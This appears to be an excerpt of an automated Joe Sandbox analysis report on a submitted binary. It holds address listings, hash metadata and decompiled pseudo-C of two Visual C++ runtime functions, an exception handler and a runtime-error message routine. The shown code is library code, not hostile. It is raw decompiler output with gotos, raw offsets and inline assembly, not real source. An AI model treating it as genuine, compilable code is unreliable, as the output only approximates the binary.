                                                                                              0x01383962
                                                                                              0x01383965
                                                                                              0x01383968
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138396e
                                                                                              0x01383972
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383978
                                                                                              0x0138397b
                                                                                              0x0138397e
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383984
                                                                                              0x01383988
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0138398e
                                                                                              0x01383991
                                                                                              0x01383994
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383996
                                                                                              0x0138399a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839a0
                                                                                              0x013839a3
                                                                                              0x013839a6
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839a8
                                                                                              0x013839ac
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839b2
                                                                                              0x013839b5
                                                                                              0x013839b8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839ba
                                                                                              0x013839be
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839c4
                                                                                              0x013839c7
                                                                                              0x013839ca
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839cc
                                                                                              0x013839d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839d6
                                                                                              0x013839dc
                                                                                              0x013839df
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839e1
                                                                                              0x013839e8
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x013839ea
                                                                                              0x0138389a
                                                                                              0x0138389d
                                                                                              0x00000000
                                                                                              0x0138389d
                                                                                              0x01383882
                                                                                              0x01383885
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01383885
                                                                                              0x0138376b
                                                                                              0x0138376b
                                                                                              0x0138376e
                                                                                              0x01383771
                                                                                              0x01383774
                                                                                              0x00000000
                                                                                              0x01383774
                                                                                              0x01383760
                                                                                              0x00000000
                                                                                              0x013836dc
                                                                                              0x013836dc
                                                                                              0x013836e0
                                                                                              0x013836e4
                                                                                              0x013836f2
                                                                                              0x00000000
                                                                                              0x013836f7

                                                                                              APIs
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: __aulldiv
                                                                                              • String ID: :$f$f$f$p$p$p
                                                                                              • API String ID: 3732870572-1434680307
                                                                                              • Opcode ID: a4110bc79099b7ae4e9b8b39d9c5c7a2d4fe0d0198238fcf834bd0f6c36d1b5b
                                                                                              • Instruction ID: 8e7c4ccf35075b6074d9ce74afc65d930021db618b120a742b2ab2ec8888e409
                                                                                              • Opcode Fuzzy Hash: a4110bc79099b7ae4e9b8b39d9c5c7a2d4fe0d0198238fcf834bd0f6c36d1b5b
                                                                                              • Instruction Fuzzy Hash: C3026B75D143589AEF20AFA9C4586EDBF76FB40F2CF688119D9156B380D338CE888B15
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01385CEF Relevance: 14.3, APIs: 5, Strings: 3, Instructions: 303COMMONLIBRARYCODE
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 64%
                                                                                              			E01385CEF(signed int __edx, intOrPtr* _a4, signed int _a8, signed int _a12, intOrPtr _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32, signed int _a36) {
				intOrPtr _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				intOrPtr* _v44;
				intOrPtr _v48;
				signed int* _v52;
				intOrPtr _v56;
				signed int _v64;
				void* _v68;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				signed int _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t146;
				signed int _t152;
				void* _t155;
				signed char _t160;
				signed int _t161;
				void* _t163;
				void* _t166;
				void* _t169;
				intOrPtr* _t179;
				void* _t182;
				intOrPtr* _t183;
				signed int _t184;
				signed int _t185;
				signed int _t187;
				void* _t191;
				void* _t196;
				void* _t197;
				intOrPtr _t201;
				intOrPtr* _t202;
				signed int _t203;
				signed int _t210;
				signed int _t211;
				intOrPtr _t214;
				signed int* _t218;
				signed int _t219;
				signed int _t224;
				signed int _t225;
				signed int _t231;
				void* _t234;
				void* _t235;

				_t216 = __edx;
				_t218 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t204 = E0138A817(_a8, _a16, _t218);
				_t235 = _t234 + 0xc;
				_v12 = _t204;
				if(_t204 < 0xffffffff || _t204 >= _t218[1]) {
					L67:
					E0135B0BB(_t202, _t204, _t216, _t218, _t225);
					asm("int3");
					__eflags = _v88;
					_push(_t202);
					_t203 = _v92;
					_push(_t225);
					_push(_t218);
					_t219 = _v108;
					if(__eflags != 0) {
						_push(_a24);
						_push(_t203);
						_push(_t219);
						_push(_v0);
						E01385C56(_t203, _t219, _t225, __eflags);
						_t235 = _t235 + 0x10;
					}
					_t146 = _a36;
					__eflags = _t146;
					if(_t146 == 0) {
						_t146 = _t219;
					}
					E01366229(_t204, _t146, _v0);
					_t226 = _a28;
					_push( *_a28);
					_push(_a16);
					_push(_a12);
					_push(_t219);
					E0138532F(_t203, _t204, _t216, _t219, _a28, __eflags);
					E0138A834(_t219, _a16,  *((intOrPtr*)(_t226 + 4)) + 1);
					_push(0x100);
					_push(_a32);
					_push( *((intOrPtr*)(_t203 + 0xc)));
					_push(_a16);
					_push(_a8);
					_push(_t219);
					_push(_v0);
					_t152 = E0138565D(_t203, _t216, _t219, _t226, __eflags);
					__eflags = _t152;
					if(_t152 != 0) {
						E013661F9(_t152, _t219);
						return _t152;
					}
					return _t152;
				} else {
					_t202 = _a4;
					if( *_t202 != 0xe06d7363 ||  *((intOrPtr*)(_t202 + 0x10)) != 3 ||  *((intOrPtr*)(_t202 + 0x14)) != 0x19930520 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930521 &&  *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
						L22:
						_t216 = _a12;
						_v8 = _a12;
						goto L24;
					} else {
						_t225 = 0;
						if( *((intOrPtr*)(_t202 + 0x1c)) != 0) {
							goto L22;
						} else {
							_t155 = E0135B16E(_t202, _t204, _t216, _t218, 0);
							if( *((intOrPtr*)(_t155 + 0x10)) == 0) {
								L61:
								return _t155;
							} else {
								_t202 =  *((intOrPtr*)(E0135B16E(_t202, _t204, _t216, _t218, 0) + 0x10));
								_t191 = E0135B16E(_t202, _t204, _t216, _t218, 0);
								_v28 = 1;
								_v8 =  *((intOrPtr*)(_t191 + 0x14));
								if(_t202 == 0 ||  *_t202 == 0xe06d7363 &&  *((intOrPtr*)(_t202 + 0x10)) == 3 && ( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930521 ||  *((intOrPtr*)(_t202 + 0x14)) == 0x19930522) &&  *((intOrPtr*)(_t202 + 0x1c)) == _t225) {
									goto L67;
								} else {
									if( *((intOrPtr*)(E0135B16E(_t202, _t204, _t216, _t218, _t225) + 0x1c)) == _t225) {
										L23:
										_t216 = _v8;
										_t204 = _v12;
										L24:
										_v52 = _t218;
										_v48 = 0;
										__eflags =  *_t202 - 0xe06d7363;
										if( *_t202 != 0xe06d7363) {
											L57:
											__eflags = _t218[3];
											if(_t218[3] <= 0) {
												goto L60;
											} else {
												__eflags = _a24;
												if(_a24 != 0) {
													goto L67;
												} else {
													E01386114(_t204, _t216, _t218, _t225, _t202, _a8, _t216, _a16, _t218, _t204, _a28, _a32);
													_t235 = _t235 + 0x20;
													goto L60;
												}
											}
										} else {
											__eflags =  *((intOrPtr*)(_t202 + 0x10)) - 3;
											if( *((intOrPtr*)(_t202 + 0x10)) != 3) {
												goto L57;
											} else {
												__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930520;
												if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930520) {
													L29:
													_t225 = _a32;
													__eflags = _t218[3];
													if(_t218[3] > 0) {
														E01366189(_t204,  &_v68,  &_v52, _t204, _a16, _t218, _a28);
														_t216 = _v64;
														_t235 = _t235 + 0x18;
														_t179 = _v68;
														_v44 = _t179;
														_v16 = _t216;
														__eflags = _t216 - _v56;
														if(_t216 < _v56) {
															_t210 = _t216 * 0x14;
															__eflags = _t210;
															_v32 = _t210;
															do {
																_t211 = 5;
																_t182 = memcpy( &_v104,  *((intOrPtr*)( *_t179 + 0x10)) + _t210, _t211 << 2);
																_t235 = _t235 + 0xc;
																__eflags = _v104 - _t182;
																if(_v104 <= _t182) {
																	__eflags = _t182 - _v100;
																	if(_t182 <= _v100) {
																		_t214 = 0;
																		_v20 = 0;
																		__eflags = _v92;
																		if(_v92 != 0) {
																			_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																			_t183 =  *((intOrPtr*)( *((intOrPtr*)(_t202 + 0x1c)) + 0xc));
																			_t184 = _t183 + 4;
																			__eflags = _t184;
																			_v36 = _t184;
																			_t185 = _v88;
																			_v40 =  *_t183;
																			_v24 = _t185;
																			do {
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				asm("movsd");
																				_t231 = _v40;
																				_t224 = _v36;
																				__eflags = _t231;
																				if(_t231 <= 0) {
																					goto L40;
																				} else {
																					while(1) {
																						_t187 = E01385A8A( &_v84,  *_t224, _t217);
																						_t235 = _t235 + 0xc;
																						__eflags = _t187;
																						if(_t187 != 0) {
																							break;
																						}
																						_t217 =  *((intOrPtr*)(_t202 + 0x1c));
																						_t231 = _t231 - 1;
																						_t224 = _t224 + 4;
																						__eflags = _t231;
																						if(_t231 > 0) {
																							continue;
																						} else {
																							_t214 = _v20;
																							_t185 = _v24;
																							goto L40;
																						}
																						goto L43;
																					}
																					_push(_a24);
																					_push(_v28);
																					_push(_a32);
																					_push(_a28);
																					_push( &_v104);
																					_push( *_t224);
																					_push( &_v84);
																					_push(_a20);
																					_push(_a16);
																					_push(_v8);
																					_push(_a8);
																					_push(_t202);
																					L68();
																					_t235 = _t235 + 0x30;
																				}
																				L43:
																				_t216 = _v16;
																				goto L44;
																				L40:
																				_t214 = _t214 + 1;
																				_t185 = _t185 + 0x10;
																				_v20 = _t214;
																				_v24 = _t185;
																				__eflags = _t214 - _v92;
																			} while (_t214 != _v92);
																			goto L43;
																		}
																	}
																}
																L44:
																_t216 = _t216 + 1;
																_t179 = _v44;
																_t210 = _v32 + 0x14;
																_v16 = _t216;
																_v32 = _t210;
																__eflags = _t216 - _v56;
															} while (_t216 < _v56);
															_t218 = _a20;
															_t225 = _a32;
														}
													}
													__eflags = _a24;
													if(__eflags != 0) {
														_push(1);
														E0135412D(_t202, _t218, _t225, __eflags);
														_t204 = _t202;
													}
													__eflags = ( *_t218 & 0x1fffffff) - 0x19930521;
													if(( *_t218 & 0x1fffffff) < 0x19930521) {
														L60:
														_t155 = E0135B16E(_t202, _t204, _t216, _t218, _t225);
														__eflags =  *(_t155 + 0x1c);
														if( *(_t155 + 0x1c) != 0) {
															goto L67;
														} else {
															goto L61;
														}
													} else {
														_t160 = _t218[8] >> 2;
														__eflags = _t218[7];
														if(_t218[7] != 0) {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																_push(_t218[7]);
																_t161 = E01385876(_t202);
																_pop(_t204);
																__eflags = _t161;
																if(_t161 == 0) {
																	goto L64;
																} else {
																	goto L60;
																}
															} else {
																goto L54;
															}
														} else {
															__eflags = _t160 & 0x00000001;
															if((_t160 & 0x00000001) == 0) {
																goto L60;
															} else {
																__eflags = _a28;
																if(_a28 != 0) {
																	goto L60;
																} else {
																	L54:
																	 *((intOrPtr*)(E0135B16E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
																	_t169 = E0135B16E(_t202, _t204, _t216, _t218, _t225);
																	_t206 = _v8;
																	 *((intOrPtr*)(_t169 + 0x14)) = _v8;
																	goto L62;
																}
															}
														}
													}
												} else {
													__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930521;
													if( *((intOrPtr*)(_t202 + 0x14)) == 0x19930521) {
														goto L29;
													} else {
														__eflags =  *((intOrPtr*)(_t202 + 0x14)) - 0x19930522;
														if( *((intOrPtr*)(_t202 + 0x14)) != 0x19930522) {
															goto L57;
														} else {
															goto L29;
														}
													}
												}
											}
										}
									} else {
										_v16 =  *((intOrPtr*)(E0135B16E(_t202, _t204, _t216, _t218, _t225) + 0x1c));
										_t196 = E0135B16E(_t202, _t204, _t216, _t218, _t225);
										_push(_v16);
										 *(_t196 + 0x1c) = _t225;
										_t197 = E01385876(_t202);
										_pop(_t206);
										if(_t197 != 0) {
											goto L23;
										} else {
											_t218 = _v16;
											_t255 =  *_t218 - _t225;
											if( *_t218 <= _t225) {
												L62:
												E0135B037(_t202, _t206, _t216, _t218, _t225, __eflags);
											} else {
												while(1) {
													_t206 =  *((intOrPtr*)(_t225 + _t218[1] + 4));
													if(E0138563E( *((intOrPtr*)(_t225 + _t218[1] + 4)), _t255, 0x139eadc) != 0) {
														goto L63;
													}
													_t225 = _t225 + 0x10;
													_t201 = _v20 + 1;
													_v20 = _t201;
													_t255 = _t201 -  *_t218;
													if(_t201 >=  *_t218) {
														goto L62;
													} else {
														continue;
													}
													goto L63;
												}
											}
											L63:
											_push(1);
											_push(_t202);
											E0135412D(_t202, _t218, _t225, __eflags);
											_t204 =  &_v64;
											E0138560B( &_v64);
											E0138A8C4( &_v64, 0x139db5c);
											L64:
											 *((intOrPtr*)(E0135B16E(_t202, _t204, _t216, _t218, _t225) + 0x10)) = _t202;
											_t163 = E0135B16E(_t202, _t204, _t216, _t218, _t225);
											_t204 = _v8;
											 *(_t163 + 0x14) = _v8;
											__eflags = _t225;
											if(_t225 == 0) {
												_t225 = _a8;
											}
											E01366229(_t204, _t225, _t202);
											L01385417(_a8, _a16, _t218);
											_t166 = E0138547D(_t218);
											_t235 = _t235 + 0x10;
											_push(_t166);
											E01385910(_t202, _t204, _t216, _t218, _t225, __eflags);
											goto L67;
										}
									}
								}
							}
						}
					}
				}
			}



























































                                                                                              0x01385cef
                                                                                              0x01385cf8
                                                                                              0x01385d01
                                                                                              0x01385d07
                                                                                              0x01385d0f
                                                                                              0x01385d11
                                                                                              0x01385d14
                                                                                              0x01385d1a
                                                                                              0x0138608e
                                                                                              0x0138608e
                                                                                              0x01386093
                                                                                              0x01386097
                                                                                              0x0138609b
                                                                                              0x0138609c
                                                                                              0x0138609f
                                                                                              0x013860a0
                                                                                              0x013860a1
                                                                                              0x013860a4
                                                                                              0x013860a6
                                                                                              0x013860a9
                                                                                              0x013860aa
                                                                                              0x013860ab
                                                                                              0x013860ae
                                                                                              0x013860b3
                                                                                              0x013860b3
                                                                                              0x013860b6
                                                                                              0x013860b9
                                                                                              0x013860bb
                                                                                              0x013860bd
                                                                                              0x013860bd
                                                                                              0x013860c3
                                                                                              0x013860c8
                                                                                              0x013860cb
                                                                                              0x013860cd
                                                                                              0x013860d0
                                                                                              0x013860d3
                                                                                              0x013860d4
                                                                                              0x013860e2
                                                                                              0x013860e7
                                                                                              0x013860ec
                                                                                              0x013860ef
                                                                                              0x013860f2
                                                                                              0x013860f5
                                                                                              0x013860f8
                                                                                              0x013860f9
                                                                                              0x013860fc
                                                                                              0x01386104
                                                                                              0x01386106
                                                                                              0x0138610a
                                                                                              0x00000000
                                                                                              0x0138610a
                                                                                              0x01386113
                                                                                              0x01385d29
                                                                                              0x01385d29
                                                                                              0x01385d32
                                                                                              0x01385e2f
                                                                                              0x01385e2f
                                                                                              0x01385e32
                                                                                              0x00000000
                                                                                              0x01385d61
                                                                                              0x01385d61
                                                                                              0x01385d66
                                                                                              0x00000000
                                                                                              0x01385d6c
                                                                                              0x01385d6c
                                                                                              0x01385d74
                                                                                              0x0138602c
                                                                                              0x0138602c
                                                                                              0x01385d7a
                                                                                              0x01385d7f
                                                                                              0x01385d82
                                                                                              0x01385d87
                                                                                              0x01385d8e
                                                                                              0x01385d93
                                                                                              0x00000000
                                                                                              0x01385dcb
                                                                                              0x01385dd3
                                                                                              0x01385e37
                                                                                              0x01385e37
                                                                                              0x01385e3a
                                                                                              0x01385e3d
                                                                                              0x01385e3f
                                                                                              0x01385e42
                                                                                              0x01385e45
                                                                                              0x01385e4b
                                                                                              0x01385ff7
                                                                                              0x01385ff7
                                                                                              0x01385ffa
                                                                                              0x00000000
                                                                                              0x01385ffc
                                                                                              0x01385ffc
                                                                                              0x01385fff
                                                                                              0x00000000
                                                                                              0x01386005
                                                                                              0x01386015
                                                                                              0x0138601a
                                                                                              0x00000000
                                                                                              0x0138601a
                                                                                              0x01385fff
                                                                                              0x01385e51
                                                                                              0x01385e51
                                                                                              0x01385e55
                                                                                              0x00000000
                                                                                              0x01385e5b
                                                                                              0x01385e5b
                                                                                              0x01385e62
                                                                                              0x01385e7a
                                                                                              0x01385e7a
                                                                                              0x01385e7d
                                                                                              0x01385e80
                                                                                              0x01385e96
                                                                                              0x01385e9b
                                                                                              0x01385e9e
                                                                                              0x01385ea1
                                                                                              0x01385ea4
                                                                                              0x01385ea7
                                                                                              0x01385eaa
                                                                                              0x01385ead
                                                                                              0x01385eb3
                                                                                              0x01385eb3
                                                                                              0x01385eb6
                                                                                              0x01385eb9
                                                                                              0x01385ec8
                                                                                              0x01385ec9
                                                                                              0x01385ec9
                                                                                              0x01385ecb
                                                                                              0x01385ece
                                                                                              0x01385ed4
                                                                                              0x01385ed7
                                                                                              0x01385edd
                                                                                              0x01385edf
                                                                                              0x01385ee2
                                                                                              0x01385ee5
                                                                                              0x01385eeb
                                                                                              0x01385eee
                                                                                              0x01385ef3
                                                                                              0x01385ef3
                                                                                              0x01385ef6
                                                                                              0x01385ef9
                                                                                              0x01385efc
                                                                                              0x01385eff
                                                                                              0x01385f02
                                                                                              0x01385f07
                                                                                              0x01385f08
                                                                                              0x01385f09
                                                                                              0x01385f0a
                                                                                              0x01385f0b
                                                                                              0x01385f0e
                                                                                              0x01385f11
                                                                                              0x01385f13
                                                                                              0x00000000
                                                                                              0x01385f15
                                                                                              0x01385f15
                                                                                              0x01385f1c
                                                                                              0x01385f21
                                                                                              0x01385f24
                                                                                              0x01385f26
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385f28
                                                                                              0x01385f2b
                                                                                              0x01385f2c
                                                                                              0x01385f2f
                                                                                              0x01385f31
                                                                                              0x00000000
                                                                                              0x01385f33
                                                                                              0x01385f33
                                                                                              0x01385f36
                                                                                              0x00000000
                                                                                              0x01385f36
                                                                                              0x00000000
                                                                                              0x01385f31
                                                                                              0x01385f4a
                                                                                              0x01385f50
                                                                                              0x01385f53
                                                                                              0x01385f56
                                                                                              0x01385f59
                                                                                              0x01385f5a
                                                                                              0x01385f5f
                                                                                              0x01385f60
                                                                                              0x01385f63
                                                                                              0x01385f66
                                                                                              0x01385f69
                                                                                              0x01385f6c
                                                                                              0x01385f6d
                                                                                              0x01385f72
                                                                                              0x01385f72
                                                                                              0x01385f75
                                                                                              0x01385f75
                                                                                              0x00000000
                                                                                              0x01385f39
                                                                                              0x01385f39
                                                                                              0x01385f3a
                                                                                              0x01385f3d
                                                                                              0x01385f40
                                                                                              0x01385f43
                                                                                              0x01385f43
                                                                                              0x00000000
                                                                                              0x01385f48
                                                                                              0x01385ee5
                                                                                              0x01385ed7
                                                                                              0x01385f78
                                                                                              0x01385f7b
                                                                                              0x01385f7c
                                                                                              0x01385f7f
                                                                                              0x01385f82
                                                                                              0x01385f85
                                                                                              0x01385f88
                                                                                              0x01385f88
                                                                                              0x01385f91
                                                                                              0x01385f94
                                                                                              0x01385f94
                                                                                              0x01385ead
                                                                                              0x01385f97
                                                                                              0x01385f9b
                                                                                              0x01385f9d
                                                                                              0x01385fa0
                                                                                              0x01385fa6
                                                                                              0x01385fa6
                                                                                              0x01385fae
                                                                                              0x01385fb3
                                                                                              0x0138601d
                                                                                              0x0138601d
                                                                                              0x01386022
                                                                                              0x01386026
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385fb5
                                                                                              0x01385fb8
                                                                                              0x01385fbb
                                                                                              0x01385fbf
                                                                                              0x01385fcd
                                                                                              0x01385fcf
                                                                                              0x01385fe6
                                                                                              0x01385fea
                                                                                              0x01385ff0
                                                                                              0x01385ff1
                                                                                              0x01385ff3
                                                                                              0x00000000
                                                                                              0x01385ff5
                                                                                              0x00000000
                                                                                              0x01385ff5
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385fc1
                                                                                              0x01385fc1
                                                                                              0x01385fc3
                                                                                              0x00000000
                                                                                              0x01385fc5
                                                                                              0x01385fc5
                                                                                              0x01385fc9
                                                                                              0x00000000
                                                                                              0x01385fcb
                                                                                              0x01385fd1
                                                                                              0x01385fd6
                                                                                              0x01385fd9
                                                                                              0x01385fde
                                                                                              0x01385fe1
                                                                                              0x00000000
                                                                                              0x01385fe1
                                                                                              0x01385fc9
                                                                                              0x01385fc3
                                                                                              0x01385fbf
                                                                                              0x01385e64
                                                                                              0x01385e64
                                                                                              0x01385e6b
                                                                                              0x00000000
                                                                                              0x01385e6d
                                                                                              0x01385e6d
                                                                                              0x01385e74
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385e74
                                                                                              0x01385e6b
                                                                                              0x01385e62
                                                                                              0x01385e55
                                                                                              0x01385dd5
                                                                                              0x01385ddd
                                                                                              0x01385de0
                                                                                              0x01385de5
                                                                                              0x01385de9
                                                                                              0x01385dec
                                                                                              0x01385df2
                                                                                              0x01385df5
                                                                                              0x00000000
                                                                                              0x01385df7
                                                                                              0x01385df7
                                                                                              0x01385dfa
                                                                                              0x01385dfc
                                                                                              0x0138602d
                                                                                              0x0138602d
                                                                                              0x00000000
                                                                                              0x01385e02
                                                                                              0x01385e0a
                                                                                              0x01385e15
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x01385e1e
                                                                                              0x01385e21
                                                                                              0x01385e22
                                                                                              0x01385e25
                                                                                              0x01385e27
                                                                                              0x00000000
                                                                                              0x01385e2d
                                                                                              0x00000000
                                                                                              0x01385e2d
                                                                                              0x00000000
                                                                                              0x01385e27
                                                                                              0x01385e02
                                                                                              0x01386032
                                                                                              0x01386032
                                                                                              0x01386034
                                                                                              0x01386035
                                                                                              0x0138603c
                                                                                              0x0138603f
                                                                                              0x0138604d
                                                                                              0x01386052
                                                                                              0x01386057
                                                                                              0x0138605a
                                                                                              0x0138605f
                                                                                              0x01386062
                                                                                              0x01386065
                                                                                              0x01386067
                                                                                              0x01386069
                                                                                              0x01386069
                                                                                              0x0138606e
                                                                                              0x0138607a
                                                                                              0x01386080
                                                                                              0x01386085
                                                                                              0x01386088
                                                                                              0x01386089
                                                                                              0x00000000
                                                                                              0x01386089
                                                                                              0x01385df5
                                                                                              0x01385dd3
                                                                                              0x01385d93
                                                                                              0x01385d74
                                                                                              0x01385d66
                                                                                              0x01385d32

                                                                                              APIs
                                                                                              • type_info::operator==.LIBVCRUNTIME ref: 01385E0E
                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 01385F1C
                                                                                              • CatchIt.LIBVCRUNTIME ref: 01385F6D
                                                                                              • _UnwindNestedFrames.LIBCMT ref: 0138606E
                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 01386089
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000002.00000002.302442957.0000000001351000.00000020.00000001.01000000.00000004.sdmp, Offset: 01350000, based on PE: true
                                                                                              • Associated: 00000002.00000002.302434278.0000000001350000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302498108.0000000001394000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302524997.000000000139E000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                              • Associated: 00000002.00000002.302537308.00000000013A4000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_2_2_1350000_cmezd.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallCatchFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                                                                                              • String ID: csm$csm$csm
                                                                                              • API String ID: 4119006552-393685449
                                                                                              • Opcode ID: 09b15a39afd6f1e931106931c01d1d969366b007b10dc987ffd126623d0b8313
                                                                                              • Instruction ID: 7d2379fe8dbcc817a5d93dce1c1309974c7c79587b6fa20d2be434db560bf66d
                                                                                              • Opcode Fuzzy Hash: 09b15a39afd6f1e931106931c01d1d969366b007b10dc987ffd126623d0b8313
                                                                                              • Instruction Fuzzy Hash: 0EB1AEB180030AEFCF29EFA8C8819AEBBB5FF14318F144159E8156B255D731EA56CF91
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 01358798 Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 154fileCOMMON
                                                                                              Download Yara Rule
                                                                                              C-Code - Quality: 60%
                                                                                              			E01358798(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4) {
				signed short* _v0;
				signed int _v8;
				signed int _v12;
				char _v13;
				void _v512;
				long _v516;
				void* __esi;
				void* _t16;
				signed int _t17;
				signed int _t26;
				short _t27;
				void* _t29;
				short _t33;
				void* _t36;
				void* _t40;
				void* _t41;
				void* _t42;
				char* _t48;
				short* _t52;
				signed short* _t53;
				void* _t54;
				void* _t57;
				void* _t60;
				void* _t61;
				WCHAR* _t62;
				signed int _t64;
				signed int _t73;
				void* _t76;

				_t54 = __edi;
				_t42 = __ebx;
				_t16 = E0136FC24(3);
				if(_t16 == 1 || _t16 == 0 &&  *0x13a04b4 == 1) {
					_pop(_t69);
					_t70 = _t73;
					_t17 =  *0x139e210; // 0xbb40e64e
					_v8 = _t17 ^ _t73;
					_t60 = GetStdHandle(0xfffffff4);
					if(_t60 != 0 && _t60 != 0xffffffff) {
						_t53 = _v0;
						_t48 =  &_v512;
						while(1) {
							 *_t48 =  *_t53;
							_t48 = _t48 + 1;
							if(_t48 ==  &_v12) {
								break;
							}
							_t26 =  *_t53 & 0x0000ffff;
							_t53 =  &(_t53[1]);
							if(_t26 != 0) {
								continue;
							}
							break;
						}
						_v13 = 0;
						_v516 = 0;
						_t19 = WriteFile(_t60,  &_v512, _t48 -  &_v512 - 1,  &_v516, 0);
					}
					_pop(_t61);
					return L01353E0D(_t19, _t42, _v12 ^ _t70, _t53, _t54, _t61);
				} else {
					_push(_t42);
					_push(_t59);
					_t27 = E01367936(0x13a04b8, 0x314, L"Runtime Error!\n\nProgram: ");
					_t76 = _t73 + 0xc;
					if(_t27 != 0) {
						L14:
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						E01364C6E();
						asm("int3");
						_t29 = E0136FC24(3);
						if(_t29 == 1 || _t29 == 0 &&  *0x13a04b4 == 1) {
							return 1;
						} else {
							return 0;
						}
					} else {
						_push(_t54);
						_t62 = 0x13a04ea;
						 *0x13a06f2 = _t27;
						if(GetModuleFileNameW(0, 0x13a04ea, 0x104) != 0) {
							L6:
							_t1 =  &(_t62[1]); // 0x13a04ec
							_t52 = _t1;
							do {
								_t33 =  *_t62;
								_t62 =  &(_t62[1]);
							} while (_t33 != 0);
							_t64 = _t62 - _t52 >> 1;
							_t2 = _t64 + 1; // 0x13a04e9
							if(_t2 <= 0x3c) {
								L10:
								_push(L"\n\n");
								_push(0x314);
								if(E013678B3(0x13a04b8) != 0) {
									goto L14;
								} else {
									_push(_a4);
									_t36 = E013678B3(0x13a04b8);
									_t57 = 0x314;
									if(_t36 != 0) {
										goto L14;
									} else {
										_push(0x12010);
										_push(L"Microsoft Visual C++ Runtime Library");
										return E0136FC6E(_t52, _t57, 0x13a04b8);
									}
								}
							} else {
								_push(3);
								_t3 = _t64 - 0x3b; // 0x13a04ad
								_t40 = E01367AF6(_t52,  &(0x13a04ea[_t3]), 0x2fb - _t3, L"...");
								_t76 = _t76 + 0x10;
								if(_t40 != 0) {
									goto L14;
								} else {
									goto L10;
								}
							}
						} else {
							_t41 = E01367936(0x13a04ea, 0x2fb, L"<program name unknown>");
							_t76 = _t76 + 0xc;
							if(_t41 != 0) {
								goto L14;
							} else {
								goto L6;
							}
						}
					}
				}
			}































                                                                                              0x01358798
                                                                                              0x01358798
                                                                                              0x0135879f
                                                                                              0x013587a8
                                                                                              0x0135889c
                                                                                              0x013588d0
                                                                                              0x013588d8
                                                                                              0x013588df
                                                                                              0x013588eb
                                                                                              0x013588ef
                                                                                              0x013588f6
                                                                                              0x013588f9
                                                                                              0x013588ff
                                                                                              0x01358901
                                                                                              0x01358903
                                                                                              0x01358909
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0135890b
                                                                                              0x0135890e
                                                                                              0x01358914
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
